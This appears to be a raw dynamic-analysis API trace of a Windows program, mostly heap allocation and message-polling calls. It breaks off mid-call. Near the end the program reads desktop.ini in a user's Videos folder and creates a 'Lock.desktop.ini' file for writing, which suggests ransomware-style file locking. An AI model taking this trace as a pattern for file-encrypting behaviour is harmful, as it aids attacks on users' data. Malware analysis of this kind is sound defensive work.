[0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.091] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.091] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0258.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0258.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0258.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.093] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0258.094] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1f8, lpOverlapped=0x0) returned 1 [0258.094] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0258.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f8) returned 0x24b2e00 [0258.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.095] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0258.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.095] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.096] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.096] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.096] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 